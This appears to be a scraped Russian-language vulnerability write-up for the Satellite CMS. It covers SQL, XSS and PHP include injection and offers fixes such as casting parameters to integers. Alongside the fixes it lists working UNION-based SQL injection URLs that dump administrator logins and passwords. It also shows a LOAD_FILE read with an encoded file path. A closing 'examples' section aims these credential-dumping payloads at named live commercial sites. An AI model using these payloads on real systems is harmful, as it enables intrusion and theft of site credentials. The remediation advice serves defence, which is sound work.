Новости возможность иньекции при подробном описании новости



Скачать 32.37 Kb.
Дата11.07.2014
Размер32.37 Kb.
ТипДокументы
Chapter 1. SQL – injection.
Satellite 1.0

На примере CIOM.KZ



  1. Ошибка в обработке параметра при выводе списка дочерних страниц на странице. Позволяет совершить SQL-иньекцию в БД без проблем были получены пароли администратора. Пример:

http://linuxhost/ciom_utf/index.php?p=16+UNION+select+pwd+,2,3,4,5,6+from+auth

выводит пароли из таблицы auth.



  1. Так же работает http://linuxhost/ciom_utf/index.php?p=16+UNION+select+LOAD_FILE(char(47,116,109,112,47,112,97,115,115,119,100)),2,3,4,5,6

Но данные не выводит с звязи с особеностью вывода

Решение: принудительное приведение к числовому типу параметра.



  1. Модуль новости: есть возможность SQL -иньекции при выводе лент новостей

при выводе подробного описания новости так же.

Решение: принудительное приведение к числовому типу параметра.


Satellite 2.0

На примере realestate.kz

Плюсы системы (возможно это её слабые места):


  1. .htaccess в связи с особеностью передачи параметров скриптам сложно реализовать иньекцию

Ошибки:

  1. При просмотре галереи есть возможность очуществить иньекцию в следствии нефильтруемого параметра ID галереи, но в связи с особенностью системы можно осуществить вызов лишь одной функции с параметром.

http://localhost/test/cms/ajax/gallery/objects/52'and'a'='a

если данный пользователь обладает соответствующими правами (а он обладает) то он может очистить БД



  1. Новости возможность иньекции при подробном описании новости.

Заключение: Осуществление SQL-иньекциии на Satellite 2.0 затрудненно некоторыми особеностями системы, но вполне осуществимо.

Плюсы:

1. Адреса передаются как есть т.е. «%20» или «+» передаются не преобразовываясь в пробел и данные символы являются недопустимыми в SQL-запросах.

2.Символ комментария «/*» наиболее любимый «Атакующими» воспримется как разделение перемынных.
Возможность иньекции может возникнуть в связи с особенностью отдельного модуля а именно его способа обработки переменных

Например:

запрос – «select * from table where id=».$url->param[0]

select * from table where id='99999'union(select'1',null,null,null)

В связи с тем что в запрос нельзя передать пробелы а кавычки преобразуются в символ типа «%ХХ»(в некоторых браузерах) то построение запроса усложняется, но как вы убедились вполне возможно.



Решение проблемы:

При необходимости получения числового значения из параметра, перед всключением его в запрос, принудительно приводить к числовому виду. Если же необходима строка то просто убирать ненужные символы (кавычки, скобки).

Зная особености системы Satellite 2.0 можно обезопасить себя от SQL-иньекций.
Уязвимости Satellite 1.

0 примеры =)

http://www.kuik.kz/index.php?mod=news&nid=13+and+0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13/*&cath=

http://www.sulpak.kz/index.php?p=5+and+0+union+select+1,version(),3,4,5,6,7,8,9/*
http://www.sulpak.kz/index.php?mod=news&nid=28+and+0+union+select+1,2,3,login,5,6,pwd,8,9,10,11,12,13+from+auth/*


http://www.sulpak.kz/index.php?mod=news&nid=28+and+0+union+select+1,2,3,login,5,6,pwd,8,9,10,11,12,13+from+auth+limit+4,1/*
http://www.sulpak.kz/index.php?mod=pressa&nid=18+and+1&page=1

Chapter 2: XSS-атаки

Для тестирования атак данного типа иметь скрипт который позволяет пупликовать данные пользователя на общее обозрение. (форумы, чаты, доски обьявлений и гостевые книги).
Chapter 3: PHP – injection (PHP – иньекции)

В ядре системы осуществить непросто. Сложность заключается в том что при постановке параметра в функцию include() идёт проверка на наличие данного файла в директории модулей или макросов. Обмануть его можно лишь записав файл с именем «адрес включаемого файла» в директории с модулями, но сделать этого при хорошей защите сервера практически невозможно.

Пример:

if (file_exists('/modules/'.$url->module.'/'.$url->module.'.php'))

{

include('/modules/'.$url->module.'/'.$url->module.'.php');



}

Особенность системы заключается в том что свойство «module» устанавливается по тому же принципу. Т.е. если есть файл ,то это модуль, иначе это модуль «Текстовые страницы» или «Главная страница».



  1. Если же как то хакеру удасться создать папку в папке модулей с именем например «http://xak_site.narod.ru/» и в нём файл http://xak_site.narod.ru/.php это нереально так как система не позволит создать папку с таким именем.

  2. Если же сайт позволяет загружать файлы на сайт пользователям или же хакер нашёл способ загрузить его в папку то иньекция в полне осуществима. Но при этом хакеру необходимо знать структуру папок и файлов а так же работу системы.



Оптимизация

  1. Оптимизация БД

  2. Оптимизация скриптов

Описание:



  1. Оптимизация БД - обширная тема, суть её в ускорении запросов к БД используя индексы и грамотно построеные запросы. Основные принципы: Не выбирать из базы лишние поля, при создании полей в таблицах точнее указывать тип данных, по возможности не использовать вложеные запросы.

  2. Оптимизация скриптов – здесь всё проще, а) для внесения пременной в строку использовать строку вида : 'string '.$var.' end string' , а не 'string $var end string' и многое другое , здесь каждый программист должен знать эти правила.


И последнее исходя из золотого правила «Не доверяй данным полученным из вне» всегда проверяйте пришедшие через параметры или по форме данные (здесь главное не переусердствовать :-) ) Числовые данные преобразовывать в число, а строковые «очищать от ненужных символов»

Похожие:

Новости возможность иньекции при подробном описании новости iconПод Воронежем 14-летнего мальчика сбила моторка: нужна помощь очевидцев!
Новости kp. Ru последние новости России, Украины и мира, новости шоу-бизнеса, бизнес-новости дня
Новости возможность иньекции при подробном описании новости iconНовости бизнеса и политики :: Новости регионов :: Новости США и Канады
Уоррен Баффет, один из богатейших людей на планете (третье место в мире по рейтингу Forbes за 2011 год с состоянием $50 млрд.) и...
Новости возможность иньекции при подробном описании новости iconНовости. Фото к каждой новости называется номером новости
Крокус Сити. В рамках этого проекта уже активно используются интерактивные стойки в трк «Вегас», а также в Концертном Зале Крокус...
Новости возможность иньекции при подробном описании новости iconЦвета поменять (предположительно красным дату новости, потом черным жирным название, при наведении синим)
Новости – чтоб картинка менялась при наведении на другую новость, фон чтоб не менялся, а курсор перемещался при наведении на соответствующую...
Новости возможность иньекции при подробном описании новости iconС. петербург, 1 дек риа новости
С. петербург, 1 дек риа новости. Зимой в России вспышек птичьего гриппа не ожидается. Такой прогноз в интервью риа новости сделал...
Новости возможность иньекции при подробном описании новости iconДжакарта, 1 июн риа новости, Михаил Цыганов
Джакарта, 1 июн риа новости, Михаил Цыганов. Всемирная организация здравоохранения (воз) подтвердила в четверг 50-й случай заражения...
Новости возможность иньекции при подробном описании новости iconБоевые награды Великой Отечественной Войны
...
Новости возможность иньекции при подробном описании новости iconДенисова в беседе с риа новости пояснила, что руководство регионального гибдд подготовит приказ о награждении отличившихся при пожаре сотрудников
Кострома, 21 мая — риа новости, Анна Скудаева. Сотрудники дпс в городе Буй Костромской области спасли из горящего дома пять человек,...
Новости возможность иньекции при подробном описании новости iconДревний шумерский знак Инанны и флаг Украины
Сергей пауков независимый исследователь, писатель г. Киев, Украина Великая Эпоха ( The Epoch Times ) Актуальные новости и фоторепортажи...
Новости возможность иньекции при подробном описании новости icon#rtrs tv новости о телеканалах #rtrs radio новости о радио
Для работы с аудиторией, продвижения бренда ртрс и идеи цифрового телевидения были созданы представительства в Twitter, Livejournal,...
Разместите кнопку на своём сайте:
ru.convdocs.org


База данных защищена авторским правом ©ru.convdocs.org 2016
обратиться к администрации
ru.convdocs.org